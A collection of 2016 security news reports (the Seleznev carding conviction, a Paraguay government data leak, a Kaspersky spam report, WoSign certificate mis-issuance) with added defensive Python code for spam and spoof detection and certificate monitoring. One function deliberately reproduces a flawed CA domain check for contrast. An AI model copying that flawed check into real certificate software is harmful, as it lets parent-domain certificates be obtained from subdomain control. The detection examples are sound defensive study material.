“Roman Valerevich Seleznev, aka Track2, 32, was convicted after an eight-day trial of 10 counts of wire fraud, eight counts of intentional damage to a protected computer, nine counts of obtaining information from a protected computer, nine counts of possession of 15 or more unauthorized access devices and two counts of aggravated identity theft. U.S. District Judge Richard A. Jones of the Western District of Washington scheduled sentencing for Dec. 2, 2016.”

Seleznev was arrested in 2014 while attempting to board a flight in the Maldives; the arrest raised diplomatic tensions between American and Russian authorities.

The prosecution was built on data found on his laptop, which was seized at the time of the arrest. The computer contained more than 1.7 million stolen credit card numbers, some of them stolen from businesses in Western Washington.

The analysis of the laptop allowed the prosecutors to find additional evidence linking Seleznev to the servers, email accounts and financial transactions involved in the hacking scheme.

The prosecution was criticized by Seleznev’s lawyer, John Henry Browne.

“I don’t know of any case that has allowed such outrageous behavior,” said Browne.

The US DoJ replied that Seleznev “was prosecuted for his conduct not his nationality.”

Seleznev now faces up to 40 years in prison; his victims were small businesses and retailers hacked between 2008 and 2014.

Seleznev will be sentenced on December 2.

Shad0wS3C group hacked the Paraguay Secretary of National Emergency
30.8.2016 securityaffeairs Hacking

The Shad0wS3C hacker group has hacked Paraguay’s Secretary of National Emergency (SNE) and leaked online a dump from a PostgreSQL database.
Not long ago I interviewed Gh0s7, the leader of the Shad0wS3C hacker crew; now he has contacted me to announce the hack of Paraguay’s Secretary of National Emergency (SNE).

“The reason for this data leak: the government of Paraguay has violated so many human rights, and neither the UN (don’t rely on them) nor anyone else has done anything. Just to name a few:

Impunity and justice system
Torture and other ill-treatment
Violation of women’s and girls’ rights
Violations against human rights defenders”
This is the Shad0wS3C message.


As proof of the hack the group shared a data dump from a PostgreSQL database; just after the announced security breach the government website sen.gov.py was still up.

The leaked data dump includes information about material stocks and also PII belonging to employees of Paraguay’s Secretary of National Emergency. The user records include names, emails, phone numbers, addresses, salary information and other data related to their activity within the organization (e.g. their roles in the event of a national emergency).


The leaked data also includes hundreds of website login credentials with hashed passwords.

Shad0wS3C is a recently formed hacker group; in July it claimed responsibility for the data breach of the EJBCA that resulted in the exposure of credentials and certificates.

Spam and phishing in Q2 2016
30.8.2016 Kaspersky Spam

Spam: quarterly highlights

The year of ransomware in spam

Although the second quarter of 2016 has only just finished, it’s safe to say that this is already the year of ransomware Trojans. By the end of Q2 there was still a large number of emails with malicious attachments, most of which download ransomware in one way or another to a victim’s computer. However, in the period between 1 June and 21 June the proportion of these emails decreased dramatically.

The majority of malicious attachments were distributed in ZIP archives. The decline can therefore be clearly seen in the following graph showing spam with ZIP attachments that arrived in our traps:


Number of emails with ZIP archives, Q2 2016

In addition to the decline, June saw another interesting feature: this sort of spam was not sent out on Saturdays or Sundays.

The same situation could be observed in KSN: the number of email antivirus detections dropped sharply on 1 June and grew on 22 June.


Number of email antivirus detections by day, Q2 2016

This decline was caused by a temporary lull in activity by the Necurs botnet, which is mostly used to distribute this type of malicious spam. After the botnet resumed its activity, the spam email template changed, and the malicious attachments became even more sophisticated.

As in the previous quarter, the spam messages were mainly notifications about bills, invoices or price lists that were supposedly attached to the email. The attachments actually contained a Trojan downloader written in JavaScript, and in most cases the malware loaded the Locky encryptor.


For example, some of these emails contained an attachment with a Trojan downloader. When run, it downloaded Trojan-Ransom.Win32.Locky.agn, which encrypts the data on the victim’s computer and demands a ransom, to be paid in bitcoin.


The second quarter saw spammers continue to mask links using various Unicode ranges designed for specific purposes. This tactic became especially popular in 2015, and is still widely used by spammers.


The link in this example looks perfectly ordinary when rendered.

If the domain is converted from its UTF-8 form into HTML character references, the trick becomes visible: the characters, which look quite ordinary, in fact belong to the Mathematical Alphanumeric Symbols Unicode block, which is intended for mathematical formulas and not for plain text or hyperlinks. The dot in the domain is also unusual: it is the fullwidth full stop used in CJK (Chinese, Japanese and Korean) text. The rest of the hyperlink, as well as the rest of the text in these spam messages, is written using the Latin alphabet.
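The same unmasking can be automated. The Python below is an added example (mine, not Kaspersky’s code): it extracts link hosts from a constructed spam body, flags characters from the Mathematical Alphanumeric Symbols block and the fullwidth full stop, and applies NFKC normalization, which folds both back to the plain ASCII domain a keyword filter would have matched. The disguised hostname is built programmatically from ASCII so the lookalike is reproducible; both links are constructed.

```python
import re
import unicodedata

MATH_ALNUM = range(0x1D400, 0x1D800)      # Mathematical Alphanumeric Symbols block
FULLWIDTH_FULL_STOP = "\uFF0E"            # "．", not the ASCII "."
HREF_RE = re.compile(r'href="https?://([^/"\s]+)', re.IGNORECASE)


def to_math_bold(text: str) -> str:
    """Constructed lookalike: ASCII a-z -> Mathematical Bold Small letters (U+1D41A..U+1D433)."""
    return "".join(chr(0x1D41A + ord(c) - ord("a")) if "a" <= c <= "z" else c for c in text)


def analyse_host(host: str) -> dict:
    """Report what is odd about a hostname and what it normalises to."""
    flags = []
    if any(ord(c) in MATH_ALNUM for c in host):
        flags.append("math-alphanumeric letters")
    if FULLWIDTH_FULL_STOP in host:
        flags.append("fullwidth full stop")
    # NFKC applies compatibility mappings: math letters -> a-z, fullwidth stop -> "."
    normalized = unicodedata.normalize("NFKC", host)
    if normalized != host and normalized.isascii():
        flags.append("NFKC folds to plain ASCII")
    return {"host": host, "normalized": normalized, "flags": flags}


def scan_html(html: str) -> list:
    """Analyse every http(s) link host found in an HTML body."""
    return [analyse_host(h) for h in HREF_RE.findall(html)]


# Constructed spam body: one disguised link, one ordinary link.
DISGUISED = FULLWIDTH_FULL_STOP.join(to_math_bold(label) for label in ("cheap-meds", "example", "test"))
SAMPLE_HTML = (
    f'<p>Click <a href="http://{DISGUISED}/offer">here</a> now!</p>'
    '<p><a href="http://unsubscribe.example.net/u">unsubscribe</a></p>'
)

if __name__ == "__main__":
    for result in scan_html(SAMPLE_HTML):
        print(result)
```

A filter that only compares raw link text against a blocklist never sees “cheap-meds.example.test”; normalising hosts with NFKC before matching closes that gap, and the presence of any character outside ASCII in a hostname that normalises to ASCII is itself a strong spam signal.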

Spam in APT attacks

In Q2, we came across a number of APT attacks in the corporate sector. Emails were made to look as if they came from representatives of the targeted company, and contained a request to immediately transfer money to a specific account. The text was fairly plausible and hinted at a personal acquaintance and previous communication. In some cases, the emails included the logo of the attacked company. All the messages conveyed a sense of urgency (“ASAP”, “urgent”, “must be completed today”) – scammers often use this trick in an attempt to catch people off guard, so that they act rather than think.

Below is an example:

Hello NNNNN,

How are you doing! Are you available at the office? I need you to process an overdue payment that needs to be paid today.



The emails were sent selectively – to individual employees, usually connected to the finance department. The knowledge shown by the scammers suggests the attack was carefully prepared.

The most suspicious aspect of the attack was the domain used in the ‘From’ field – myfirm.moby – that differed from the corporate one. Perhaps the attackers hope that some email clients only show the sender’s name by default, while concealing the address.

It is not difficult to put any domain in the ‘From’ field, and in the future we can expect more well-prepared attacks of this kind.
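As an added example (mine, not Kaspersky’s), the heuristic below parses the ‘From’ header of a constructed message modelled on the one quoted above and scores it: the sender’s address domain is compared with the corporate domain, the display name is checked against a small directory of who normally sends from which address, and urgency and payment wording adds a little weight. The corporate domain, the sender directory and both sample messages are assumptions for the example.

```python
from email import message_from_string
from email.utils import parseaddr

# Assumptions for this example: the real corporate domain and a directory of
# who normally sends from which address. Both are constructed.
CORPORATE_DOMAIN = "myfirm.example"
KNOWN_SENDERS = {"chief executive": "ceo@myfirm.example"}
URGENCY_CUES = ("asap", "urgent", "today", "immediately", "overdue")
PAYMENT_CUES = ("payment", "transfer", "wire", "invoice")


def score_message(raw: str, corporate_domain=CORPORATE_DOMAIN, known_senders=KNOWN_SENDERS) -> dict:
    """Score a raw RFC 822 message; 4 or more is treated as suspicious."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    text = (msg.get("Subject", "") + "\n" + msg.get_payload()).lower()
    score, reasons = 0, []

    # The lookalike domain is the strongest signal: clients that show only the
    # display name hide it from the user, but not from a parser.
    if domain != corporate_domain:
        score += 3
        reasons.append(f"From domain {domain!r} is not the corporate domain {corporate_domain!r}")

    # A known display name arriving from an unexpected address.
    expected = known_senders.get(name.strip().lower())
    if expected and expected.lower() != addr.lower():
        score += 3
        reasons.append(f"display name {name!r} normally sends from {expected}")

    # Social-engineering cues carry little weight on their own.
    urgency = [w for w in URGENCY_CUES if w in text]
    if urgency:
        score += 1
        reasons.append("urgency cues: " + ", ".join(urgency))
    if any(w in text for w in PAYMENT_CUES):
        score += 1
        reasons.append("asks for a payment or transfer")

    return {"from": addr, "display_name": name, "score": score,
            "reasons": reasons, "suspicious": score >= 4}


BODY = """Hello NNNNN,

How are you doing! Are you available at the office? I need you to process an overdue payment that needs to be paid today.
"""

# Constructed messages: the spoof uses the lookalike domain from the report.
SPOOFED = ('From: "Chief Executive" <ceo@myfirm.moby>\n'
           'To: accounts@myfirm.example\n'
           'Subject: Overdue payment - urgent\n\n' + BODY)
LEGIT = SPOOFED.replace("ceo@myfirm.moby", "ceo@myfirm.example")

if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("legitimate", LEGIT)):
        print(label, score_message(raw))
```

SPF, DKIM and DMARC alignment reject outright forgeries of the corporate domain, but they do nothing against a lookalike domain the attacker legitimately owns and has configured correctly, which is why the explicit domain and display-name comparison above is still needed for internal payment requests.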

Sporting events in spam

Spam mailings exploiting real-life events have long been an integral part of junk email. Sporting events are not as popular among spammers as political events, although their use is increasing every year. There is a continuous stream of emails mentioning various political figures, while sport-related spam messages usually only appear in the run-up to an event. However, we have noticed that mass mailings can now be launched long before an event starts. For instance, emails exploiting the Olympic Games in Brazil were discovered over a year ago, in the second quarter of 2015. The majority of them were fraudulent emails designed to trick recipients and steal their personal information and money.

The classic scenario involves false notifications about lottery wins related to 2016 Olympics. The messages claim that the lottery was held by the official organizers of the games and the recipient was selected at random from millions of addresses. In order to claim the cash, the recipient has to reply to the email and provide some personal information.


The text of the message was often contained in an attached file (.pdf, .doc, .jpg), while the body of the message only displayed a short text prompting the recipient to open the attachment.


There were also more traditional messages where the spammer text was included directly in the body of the message.


In addition to fraudulent messages, advertising spam was also sent out.

Unlike the Olympics, football tournaments have long been used by scammers to grab people’s attention to their spam. Q2 2016 saw the long-awaited UEFA European Championship, and in the run-up to the tournament spam traffic included fake notifications of lottery wins. The content was no different from that dedicated to the Olympic Games, and the emails also contained attachments explaining why the message was sent.


The football theme was also exploited by ‘Nigerian’ scammers. They sent out emails supposedly on behalf of the former FIFA president, and used the infamous corruption scandal associated with his name to make their messages look more realistic. They believed that a fabricated story about how Sepp Blatter had supposedly received money and secretly transferred it to an account in a European bank would not arouse suspicion. In return for keeping the money in their bank accounts, the recipients were promised a 40% cut of the total sum.


In order to convince recipients that the message was genuine, the authors even went to the trouble of using the correct name and domain in the ‘From’ field.

US politicians in spam

The presidential election campaign is now in full swing in the United States and the nominees and their entourages are under close media scrutiny. Of course, spammers couldn’t resist using the names of high-profile politicians in their advertising and fraudulent emails. For example, numerous ‘Nigerian’ letters were sent in the name of current president Barack Obama and his wife Michelle. In their ‘official’ emails, the ‘President’ and the ‘First lady’ assured the recipient that a bank card or a check for a very large sum of money had already been issued in their name. The only thing the recipient had to do was complete some formalities, and the money would be delivered shortly afterwards. In order to get the instructions from the White House the recipient had to send some personal information, including their email address and the password for their email account, as well as detailed passport information to spoofed email addresses.


Another politician whose name regularly cropped up in spam was Donald Trump, one of the contenders for the US presidency. Spammers offered a unique Trump technique for earning money online: anyone who wanted to know how to get rich, had to click a link in the emails which were designed to look like news reports from CNN and Fox News.


The links led to fake news sites also in the style of major media outlets and news networks. The sites contained a story about a simple method for earning money – the publication of links, which is basically another kind of spam distribution. In order to participate in the program, a user had to register by providing their phone number and email address.


Proportion of spam in email traffic


Percentage of spam in global email traffic, Q2 2016

The largest percentage of spam in the second quarter – 59.46% – was registered in May and was 3 p.p. more than in April. The average percentage of spam in global email traffic for Q2 amounted to 57.25%.

Sources of spam by country


Sources of spam by country, Q2 2016

In Q2 2016, the biggest three sources of spam remained the same as in the previous quarter – the US (10.79%), Vietnam (10.10%) and India (10.01%). However, the figures for each country changed: the gap between them narrowed to within a single percentage point.

China (6.52%) moved up to fourth with an increase of 1.43 p. p. compared to Q1. Mexico (4.55%) came fifth, followed by Russia (4.07%) and France (3.60%). Brazil (3.28%), which was fourth in the previous quarter, lost 2.2 p.p. and dropped to eighth place. Germany (2.97%) and Turkey (2.30%) completed the TOP 10.

Spam email size


Breakdown of spam emails by size, Q1 and Q2 2016

Traditionally, the most commonly distributed emails are very small – up to 2 KB (72.26%), although the proportion of these emails dropped by 9.6 p.p. compared to the previous quarter. Meanwhile, the share of emails sized 10-20 KB increased by 6.76 p.p. The other categories saw minimal changes.

Malicious email attachments

Currently, the majority of malicious programs are detected proactively by automatic means, which makes it very difficult to gather statistics on specific malware modifications. So we have decided to turn to the more informative statistics of the TOP 10 malware families.

TOP 10 malware families

The three most popular malware families remained unchanged from the previous quarter – Trojan-Downloader.JS.Agent (10.45%), Trojan-Downloader.VBS.Agent (2.16%) and Trojan-Downloader.MSWord.Agent (1.82%).

The Trojan.Win32.Bayrob family moved up to fourth place (1.68%), while the Backdoor.Win32.Androm family fell from fourth to ninth place with 0.6%.


TOP 10 malware families in Q2 2016

A newcomer to this ranking was the Trojan.Win32.Inject family (0.61%). The malicious programs from this family embed their code in the address space of other processes.

The Trojan-Spy.HTML.Fraud family (0.55%) rounded off the TOP 10 in Q2 2016.

Countries targeted by malicious mailshots


Distribution of email antivirus verdicts by country, Q2 2016

Germany (14.69%) topped the ranking of countries targeted by malicious mailshots, although its share decreased 4.24 p.p. It was followed by China (13.61%) whose contribution grew 4.18 p.p. Japan (6.42%) came third after ending the previous quarter in seventh with a share of 4.29%.

Fourth place was occupied by Brazil (5.57%). Italy claimed fifth with a share of 4.9% and Russia remained in sixth (4.36%).

The US (4.06%) was the seventh most popular target of malicious mailshots. Austria (2.29%) rounded off this TOP 10.


Phishing

In Q2 2016, the Anti-Phishing system was triggered 32,363,492 times on the computers of Kaspersky Lab users, which is 2.6 million fewer than in the previous quarter. Overall, 8.7% of unique users of Kaspersky Lab products were attacked by phishers in Q2 2016.

Geography of attacks

The country where the largest percentage of users is affected by phishing attacks was China (20.22%). In Q2 2016, the proportion of those attacked increased by 3.52 p.p.


Geography of phishing attacks*, Q2 2016

* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country

The percentage of attacked users in Brazil decreased by 2.87 p.p. and accounted for 18.63%, placing the country second in this ranking. Algeria (14.3%) came third following a 2.92 p.p. increase in its share compared to the previous quarter.

TOP 10 countries by percentage of users attacked:

China 20.22%
Brazil 18.63%
Algeria 14.3%
United Kingdom 12.95%
Australia 12.77%
Vietnam 11.46%
Ecuador 11.14%
Chile 11.08%
Qatar 10.97%
Maldives 10.94%

Organizations under attack

The statistics on phishing targets are based on detections of Kaspersky Lab’s heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab’s databases. It does not matter how the user attempts to open the page – by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, a banner is displayed in the browser warning the user about a potential threat.

In Q2 of 2016, the share of the ‘Global Internet portals’ category (20.85%), which topped the rating in the first quarter, decreased considerably – by 7.84 p.p. The share of the ‘Financial organizations’ category grew 2.07 p.p. and accounted for 46.23%. This category covers ‘Banks’ (25.43%, +1.51 p.p.), ‘Payment systems’ (11.42%, -0.42 p.p.) and ‘Online stores’ (9.39%, +0.99 p.p.).


Distribution of organizations affected by phishing attacks by category, Q2 2016

The share of attacks on the ‘Social networking sites’ category increased by 2.65 p.p. and reached 12.4%. The ‘Online games’ category was also attacked more often (5.65%, + 1.96 p.p.). Meanwhile, the ‘Telephone and Internet service providers’ (4.33%) and the ‘IMS’ (1.28%) categories lost 1.17 p.p. and 2.15 p.p. respectively.

Hot topics this quarter

The Olympics in Brazil

For a number of years now Brazil has been among the countries with the highest proportion of users targeted by phishing. In 2015 and 2016 phishers have focused on the Rio Olympic Games in Brazil. Last quarter showed that as well as ordinary users, the potential victims of phishing included the organizers of the Olympic Games.

The Olympic theme remained popular in Q2, with phishers working overtime to send out fake notifications about big cash wins in a lottery that was supposedly organized by the Brazilian government and the Olympic Committee.

‘Porn virus’ for Facebook users

Facebook users are often subjected to phishing attacks. During one attack in the second quarter, a provocative video was used as bait. To view it, the user was directed to a fake page imitating the popular YouTube video portal, and told to install a browser extension.

This extension requested rights to read all the data in the browser, potentially giving the cybercriminals access to passwords, logins, credit card details and other confidential user information. The extension also distributed more links on Facebook that directed to itself, but which were sent using the victim’s name.

Phisher tricks

Compromising domains with good reputation

To bypass security software filters, fraudsters try to place phishing pages on domains with good reputations. This significantly reduces the probability of them being blocked and means potential victims are more trusting. The phishers can strike it big if they can use a bank or a government agency domain for their purposes. In Q2, we came across a phishing attack targeting the visitors of a popular Brazilian e-commerce site: the fake page was located on the domain of a major Indian bank. This is not the first time fraudsters have compromised the domain of a large bank and placed their content on it.

Phishing pages targeting the users of the Brazilian store americanas.com

When trying to purchase goods on the fake pages of the store, the victim is asked to enter lots of personal information. When it’s time to pay, the victim is prompted to print out a receipt that now shows the logo of a Brazilian bank.

The domains of state structures are hacked much more frequently by phishers. In Q2 2016, we registered numerous cases where phishing pages were located on the domains belonging to the governments of various countries. Here are just a few of them:

Phishing pages located on the domains of government authorities

The probability of these links being placed on blacklists is negligible thanks to the reputation of the domain.

TOP 3 organizations attacked

Fraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. More than half of all detections of Kaspersky Lab’s heuristic anti-phishing component fall on phishing pages hiding behind the names of fewer than 15 companies.

The TOP 3 organizations attacked most frequently by phishers accounted for 23% of all phishing links detected in Q2 2016.

Rank  Organization  % of detected phishing links
1     Microsoft     8.1
2     Facebook      8.03
3     Yahoo!        6.87
In Q2 2016, this TOP 3 ranking saw a few changes. Microsoft was the new leader with 8.1% (+0.61 p.p.), while Facebook (8.03%, +2.32 p.p.) came second. The share of attacks targeting Yahoo! (6.87%) fell 1.46 p.p., leaving last quarter’s leader in third.

Q2 leader Microsoft is included in the ‘Global Internet portals’ category because the user can access a variety of the company’s services from a single account. This is what attracts the fraudsters: in the event of a successful attack, they gain access to a number of services used by the victim.

Example of phishing on Live.com, a Microsoft service


In the second quarter of 2016, the proportion of spam in email traffic increased insignificantly – by 0.33 p.p. – compared to the previous quarter and accounted for 57.25%. The US remained the biggest source of spam. As in the previous quarter, the top three sources also included Vietnam and India.

Germany was once again the country targeted most by malicious mailshots, followed closely by China. Japan, which was seventh in the previous quarter’s ranking, completed the TOP 3 in Q2.

Trojan-Downloader.JS.Agent remained the most popular malware family distributed via email. Next came Trojan-Downloader.VBS.Agent and Trojan-Downloader.MSWord.Agent. A significant amount of malicious spam was used to spread ransomware Trojans such as Locky. For almost a month, however, cybercriminals did not distribute their malicious spam, but then the Necurs botnet began working again. We don’t expect to see any significant reduction in the volume of malicious spam in the near future, although there may be changes in email patterns, the complexity of the malware, as well as the social engineering methods used by attackers to encourage a user to launch a malicious attachment.

The focus of phishing attacks shifted slightly from the ‘Global Internet portals’ to the ‘Financial organizations’ category.

The theme of the Olympic Games was exploited by both phishers and spammers to make users visit fake pages with the aim of acquiring their confidential information or simply to get their money.

Events in the political arena, such as the presidential election in the US, also attracted spammers, while the sites of government agencies were compromised in phishing attacks.

As we can see, the overriding trend of the quarter is that of fraud and making quick money from victims using direct methods such as Trojan cryptors that force unprotected users to pay a ransom, or phishing attacks that target financial organizations, rather than long drawn-out scams. All of this once again highlights the need for both comprehensive protection on computers and increased vigilance by Internet users.

Chinese Certificate Authority 'mistakenly' gave out SSL Certs for GitHub Domains
30.8.2016 thehackernews Safety
A Chinese certificate authority (CA) appears to have made a significant security blunder by handing out duplicate SSL certificates for a base domain to anyone who controlled just one of its subdomains.
The certificate authority, named WoSign, issued a certificate for the base GitHub domains to an unnamed GitHub user.
But how? First of all, you should know that the traditional digital certificate management system is the weakest link on the Internet today and has already been broken.
Billions of Internet users blindly rely on hundreds of Certificate Authorities (CA) around the globe to ensure the confidentiality and integrity of their personal data.
But any of these CAs has the power to issue a valid SSL certificate for any domain you own, regardless of whether you have already purchased one from another CA.
...and that's the biggest loophole in the CA system.
In the latest case as well, WoSign issued a duplicate SSL certificate for GitHub domains without verifying ownership of the base domain.
The incident was first publicly disclosed by British Mozilla programmer Gervase Markham on Mozilla's security policy mailing list saying the issue occurred over a year ago in July 2015 but went unreported.
"In June 2015, an applicant found a problem with WoSign's free certificate service, which allowed them to get a certificate for the base domain if they were able to prove control of a subdomain," Markham wrote in the mailing list.
According to Markham, an unnamed security researcher accidentally discovered this security blunder when trying to get a certificate for 'med.ucf.edu' but mistakenly also applied for 'www.ucf.edu' and WoSign approved it, handing over the certificate for the university's primary domain.
For testing purposes, the researcher also used this trick against the GitHub base domains, i.e. github.com and github.io, by proving control over a user-based subdomain.
...And guess what? WoSign handed over the certificates for GitHub's main domains, too.
The researcher reported the issue to WoSign, citing only the GitHub certificate as an example. Consequently, the Chinese CA revoked only the GitHub certificate rather than both.
Why just one? It is quite possible that the CA has no way of tracking down and revoking all the other mistakenly issued base-domain certificates on its own, even after being informed of the problem.
The researcher recently got in touch with Google and reported that the ucf.edu cert had still not been revoked almost a year later.
How to check whether a rogue cert for your domain has been issued to someone else, probably a malicious attacker?

Solution: Certificate Transparency or CT, a public service that allows individuals and companies to monitor how many digital security certs have secretly been issued for their domains.
Certificate Transparency requires CAs to declare publicly (to Certificate Log) every digital cert they have generated. Even WoSign has participated in CT.
Certificate Log offers you a way to look up all of the digital certificates that have been issued for your domain name.
Also read: Learn How Certificate Transparency Monitoring Tool Helped Facebook Early Detect Duplicate SSL Certs?
Although Certificate Transparency doesn't prevent a CA from issuing forged certificates, it makes detecting rogue certificates much easier.
Currently, Google, Symantec, DigiCert, and a few other CAs are hosting public CT logs.
You can try Google's Certificate Transparency Lookup Tool or Comodo's Certificate Transparency Search tool to check all certificates present in public Certificate Transparency logs that have been issued for your domain.
If you find a fraudulent certificate issued for your domain, report it to the respective CA and address it immediately.
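The two defences this article points at, the authorization rule a CA's domain validation should apply and a Certificate Transparency check over entries for your own domains, as an added Python example (not code from the article, WoSign or GitHub; the issuer names, log indices and expected-CA lists are constructed, and the flawed rule is a hypothetical reconstruction of the bug class, not WoSign's actual logic):

```python
"""Added example: two defensive checks for the mis-issuance described above.
Not code from the article, WoSign or GitHub; all sample data is constructed."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Iterable


def _labels(name: str) -> list[str]:
    return name.lower().rstrip(".").split(".")


def is_same_or_subdomain(candidate: str, parent: str) -> bool:
    """True when candidate equals parent or lies underneath it."""
    c, p = _labels(candidate), _labels(parent)
    return len(c) >= len(p) and c[-len(p):] == p


def _strip_wildcard(name: str) -> str:
    return name[2:] if name.startswith("*.") else name


def ca_may_issue(requested: str, validated: Iterable[str]) -> bool:
    """Correct CA-side rule: proving control of a name authorizes that name
    and names below it, never a parent. A wildcard needs its base validated."""
    base = _strip_wildcard(requested)
    return any(is_same_or_subdomain(base, v) for v in validated)


def ca_may_issue_flawed(requested: str, validated: Iterable[str]) -> bool:
    """Hypothetical reconstruction of the bug class in the article (not
    WoSign's code): control of any name is treated as control of its
    registrable base, so med.ucf.edu 'proves' ucf.edu and everything under it.
    The base is crudely taken as the last two labels; a real CA would consult
    the Public Suffix List. Shown for contrast only."""
    base = _strip_wildcard(requested)
    return any(is_same_or_subdomain(base, ".".join(_labels(v)[-2:]))
               for v in validated)


@dataclass
class CTEntry:
    """One simplified CT log entry: issuer plus every DNS name on the cert."""
    log_index: int
    issuer: str
    names: list[str]


@dataclass
class Watch:
    """A domain you own, the CAs you actually buy from, and whether certs for
    its subdomains count. Use include_subdomains=False where third parties
    legitimately hold subdomains (the user-based GitHub subdomains above)."""
    domain: str
    expected_issuers: set[str]
    include_subdomains: bool = True


def name_in_scope(cert_name: str, watch: Watch) -> bool:
    """A wildcard is judged by its base, so *.example.com is in scope for
    example.com even when ordinary subdomains are ignored."""
    base = _strip_wildcard(cert_name)
    if watch.include_subdomains:
        return is_same_or_subdomain(base, watch.domain)
    return _labels(base) == _labels(watch.domain)


def find_unexpected_certs(entries: Iterable[CTEntry],
                          watches: Iterable[Watch]) -> list[tuple[int, str, str]]:
    """(log_index, watched domain, issuer) for every entry that covers a watched
    domain but was not issued by one of that domain's expected CAs."""
    alerts = []
    for e in entries:
        for w in watches:
            if e.issuer in w.expected_issuers:
                continue
            if any(name_in_scope(n, w) for n in e.names):
                alerts.append((e.log_index, w.domain, e.issuer))
    return sorted(alerts)


# Constructed sample data: indices and issuer strings are illustrative only.
SAMPLE_ENTRIES = [
    CTEntry(1001, "DigiCert", ["github.com", "www.github.com"]),
    CTEntry(1002, "WoSign", ["github.com"]),        # base domain, unexpected CA
    CTEntry(1003, "WoSign", ["*.github.io"]),       # wildcard, unexpected CA
    CTEntry(1004, "Let's Encrypt", ["pages.example.net"]),
    CTEntry(1005, "WoSign", ["alice.github.io"]),   # user subdomain: legitimate
    CTEntry(1006, "DigiCert", ["*.github.io"]),
]
WATCHES = [
    Watch("github.com", {"DigiCert"}),
    Watch("github.io", {"DigiCert"}, include_subdomains=False),
]


def demo() -> list[tuple[int, str, str]]:
    return find_unexpected_certs(SAMPLE_ENTRIES, WATCHES)


if __name__ == "__main__":
    print("validated med.ucf.edu, requested www.ucf.edu: flawed ->",
          ca_may_issue_flawed("www.ucf.edu", ["med.ucf.edu"]),
          "correct ->", ca_may_issue("www.ucf.edu", ["med.ucf.edu"]))
    for idx, domain, issuer in demo():
        print(f"CT entry {idx}: certificate covering {domain} issued by {issuer}")
```

Against real CT data, the same `find_unexpected_certs` check runs over entries pulled from a public log, which is what the monitoring tools mentioned above automate.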

Russian Lawmaker's Son Convicted of Stealing 2.9 Million Credit Card Numbers
29.8.2016 thehackernews Crime
The son of a prominent Russian lawmaker has been found guilty in the United States of running a hacking scheme that stole and sold 2.9 million US credit card numbers using Point-of-Sale (POS) malware, costing financial institutions more than $169 Million.
Roman Seleznev, 32, the son of Russian Parliament member Valery Seleznev, was arrested in 2014 while attempting to board a flight in the Maldives, which sparked an international dispute between American and Russian authorities, who characterized the extradition as a "kidnapping."
Prosecutors introduced evidence from a corrupted laptop seized by the authorities at the time of his arrest. "I don't know of any case that has allowed such outrageous behavior," said his lawyer, John Henry Browne.
Also Read: How to Freeze Credit Report To Protect Yourself Against Identity Theft.
According to the Department of Justice, Seleznev, who also went by the moniker 'Track2' online, was convicted in a Washington court on Thursday of 38 charges related to stolen credit card details, which includes:
Ten counts of Wire Fraud
Nine counts of obtaining information from a Protected Computer
Nine counts of possession of 15 Unauthorized Devices
Eight counts of Intentional Damage to a Protected Computer
Two counts of Aggravated Identity Theft
Seleznev and potentially other criminals who are unknown to the authorities developed a hacking scheme that used automated techniques to hack into POS machines in retailers and then installed malware to steal copies of credit card numbers.
The lists of stolen credit card numbers were then sold on various online "carding" websites. According to prosecutors, more than 3,700 businesses were hit by the hacking attacks.
If convicted, Seleznev could face up to 40 years in prison for hacking into Seattle pizza shops, retailers and U.S. businesses around the globe from 2008 to 2014 and stealing millions of credit card details.
Seleznev faces a mandatory jail term of 4 years, and will be sentenced on 2 December.
The US Justice Department said Seleznev "was prosecuted for his conduct not his nationality."

Shad0wS3C group hacked the Paraguay Secretary of National Emergency
29.8.2016 securityaffeirs Hacking

Shad0wS3C hacker group has hacked the Paraguay’s Secretary of National Emergency (SNE) and leaked online a dump from a PostgreSQL database.
Not so long ago I interviewed Gh0s7, the leader of the Shad0wS3C hacker crew; now he has contacted me to announce the hack of Paraguay’s Secretary of National Emergency (SNE).

“The reason for this data leak. The government of Paraguay has violated so many human rights, and neither the UN (don’t rely on them) nor anyone else has done anything. Just to name a few:

Impunity and justice system
Torture and other ill-treatment
Violation of Women’s and girls’ rights
Violation against Human rights defenders”
This is the Shad0wS3C message.

As proof of the hack, the group shared a data dump from a PostgreSQL database; when the breach was announced, the government website sen.gov.py was still up.

The leaked data dump includes information about material stocks and also PII belonging to employees of Paraguay’s Secretary of National Emergency. Users’ records include names, emails, phone numbers, addresses, salary information, and other data related to their activity within the government organization (i.e. their roles in the event of a national emergency).

The leaked data also includes hundreds of website login credentials with hashed passwords.

Shad0wS3c is a recently formed hacker group; in July it claimed responsibility for the data breach of the EJBCA that resulted in the exposure of credentials and certificates.

DNC staffers are invited to use ‘Snowden-Approved’ App Signal in response to the hack
29.8.2016 securityaffeirs Hacking

In the aftermath of the DNC hack, the staffers were instructed in the use of the popular instant messaging app Signal, also known as the “Snowden-approved” app.
The need for privacy is pushing the IT industry to develop secure messaging systems that implement end-to-end encryption to protect users from prying eyes. Signal is probably the most popular such app at the moment.

The Signal app comes from Open Whisper Systems and is available for both Android and iOS devices. If you are looking for the most secure messaging app, you can use Signal to strengthen the security of your texts and phone calls. It is free of charge and encrypts your data.

The app automatically syncs with your address book, which makes it easy to encrypt your communication with all your contacts; you do not need separate login credentials to start using it.

If you search for Signal on the Internet you will discover that Edward Snowden is probably its most illustrious user and advocate.

“Use anything by Open Whisper Systems” Snowden says.

The cryptographer and Johns Hopkins University professor Matt Green and the popular security expert Bruce Schneier are two other admirers of the Signal app, and recently we also saw the application in the popular TV series Mr. Robot.

There is no doubt, Signal is the first choice for hackers and security experts … and not only them.

In the aftermath of the Democratic National Committee hack the staffers were instructed in the use of the popular instant messaging app, also called the “Snowden-approved” app.

Edward Snowden ✔ @Snowden
2015: Even if he revealed unlawful government surveillance, put him in jail!
2016: wait what apps does he use
22:58 - 27 Aug 2016
“Signal, staffers in the meeting were told, was “Snowden-approved.” A week after the meeting at the campaign headquarters, according to two people who have worked with the D.N.C. and the Clinton campaign, an e-mail was sent out instructing staffers where to download the app and how to use it.” reported Vanity Fair.

